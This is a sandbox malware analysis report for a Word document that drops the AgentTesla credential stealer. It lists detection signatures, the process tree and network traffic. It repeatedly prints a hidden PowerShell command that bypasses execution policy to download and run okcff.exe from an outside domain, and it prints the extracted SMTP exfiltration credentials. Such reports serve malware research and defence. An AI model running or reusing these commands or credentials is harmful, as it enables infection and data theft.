Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 478644.doc

Overview

General Information

Sample Name:478644.doc
Analysis ID:553100
MD5:c0f8f2fc481e9be7141d84b401edf1f7
SHA1:ab1dbe841b083ea886c9023307c0527f7bfbfff3
SHA256:4b0d21f58347c62f76445c6aa17a21dd00970f235734a1d1db4a40ee5a8b7c45
Tags:doc
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Yara detected AgentTesla
Sigma detected: Powershell download and execute file
Document exploit detected (creates forbidden files)
Microsoft Office creates scripting files
Office process drops PE file
Injects files into Windows application
Document contains OLE streams with names of living off the land binaries
Bypasses PowerShell execution policy
Sigma detected: Change PowerShell Policies to a Unsecure Level
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Yara detected Costura Assembly Loader
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Document contains a stream with embedded javascript code
Injects a PE file into a foreign processes
Powershell drops PE file
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Found suspicious RTF objects
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Sigma detected: Verclsid.exe Runs COM Object
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Sigma detected: PowerShell Download from URL
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2724 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • powershell.exe (PID: 2904 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • powershell.exe (PID: 1308 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • powershell.exe (PID: 292 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • okcff.exe (PID: 2656 cmdline: "C:\Users\user\AppData\Roaming\okcff.exe" MD5: E9416A322E9A796D45588BC4FB04CD45)
        • cmd.exe (PID: 2028 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 1972 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 2104 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2060 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 1864 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2100 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 1892 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2780 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 2712 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2228 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 448 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2632 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 2792 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 1188 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 836 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 1308 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 2424 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 1204 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • okcff.exe (PID: 2176 cmdline: C:\Users\user\AppData\Roaming\okcff.exe MD5: E9416A322E9A796D45588BC4FB04CD45)
    • verclsid.exe (PID: 2432 cmdline: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)
    • notepad.exe (PID: 2652 cmdline: C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT MD5: B32189BDFF6E577A92BAA61AD49264E6)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "hisgraceinme@yandex.com", "Password": "newyear2022", "Host": "smtp.yandex.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000005.00000002.438152998.00000000003A0000.00000004.00000020.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
          • 0x325b:$sb1: -W Hidden
          • 0x324b:$sc1: -NoP
          • 0x3255:$sd1: -NonI
          • 0x3265:$se3: -ExecutionPolicy bypass
          • 0x3250:$sf1: -sta
          Click to see the 24 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          41.0.okcff.exe.400000.9.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            41.0.okcff.exe.400000.9.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              41.0.okcff.exe.400000.13.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                41.0.okcff.exe.400000.13.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  9.2.okcff.exe.3605ff0.7.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 26 entries

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: Change PowerShell Policies to a Unsecure LevelShow sources
                    Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904
                    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904
                    Sigma detected: PowerShell DownloadFileShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904
                    Sigma detected: Verclsid.exe Runs COM ObjectShow sources
                    Source: Process startedAuthor: Victor Sergeev, oscd.community: Data: Command: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine|base64offset|contains: , Image: C:\Windows\System32\verclsid.exe, NewProcessName: C:\Windows\System32\verclsid.exe, OriginalFileName: C:\Windows\System32\verclsid.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, ProcessId: 2432
                    Sigma detected: PowerShell Download from URLShow sources
                    Source: Process startedAuthor: Florian Roth, oscd.community, Jonhnathan Ribeiro: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904
                    Sigma detected: Windows Suspicious Use Of Web Request in CommandLineShow sources
                    Source: Process startedAuthor: James Pemberton / @4A616D6573: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904
                    Sigma detected: Non Interactive PowerShellShow sources
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904

                    Data Obfuscation:

                    barindex
                    Sigma detected: Powershell download and execute fileShow sources
                    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904

                    Jbx Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Found malware configurationShow sources
                    Source: 41.0.okcff.exe.400000.5.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "hisgraceinme@yandex.com", "Password": "newyear2022", "Host": "smtp.yandex.com"}
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: 478644.docVirustotal: Detection: 41%Perma Link
                    Source: 478644.docReversingLabs: Detection: 30%
                    Machine Learning detection for dropped fileShow sources
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\okcff.exeJoe Sandbox ML: detected
                    Source: 41.0.okcff.exe.400000.5.unpackAvira: Label: TR/Spy.Gen8
                    Source: 41.0.okcff.exe.400000.7.unpackAvira: Label: TR/Spy.Gen8
                    Source: 41.0.okcff.exe.400000.9.unpackAvira: Label: TR/Spy.Gen8
                    Source: 41.0.okcff.exe.400000.13.unpackAvira: Label: TR/Spy.Gen8
                    Source: 41.0.okcff.exe.400000.11.unpackAvira: Label: TR/Spy.Gen8
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: System.Management.Automation.pdbBBa?p source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256 source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp
                    Source: Binary string: protobuf-net.pdb source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

                    Software Vulnerabilities:

                    barindex
                    Document exploit detected (drops PE files)Show sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: okcff[1].exe.0.drJump to dropped file
                    Document exploit detected (creates forbidden files)Show sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScTJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exeJump to behavior
                    Document exploit detected (process start blacklist hit)Show sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: global trafficDNS query: name: mitmar-pl.com
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 37.0.9.166:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 37.0.9.166:80
                    Source: Joe Sandbox ViewASN Name: WKD-ASIE WKD-ASIE
                    Source: global trafficHTTP traffic detected: GET /okcff.exe HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /okcff.exe HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /Crkrqdrd.jpeg HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 37.0.9.166 37.0.9.166
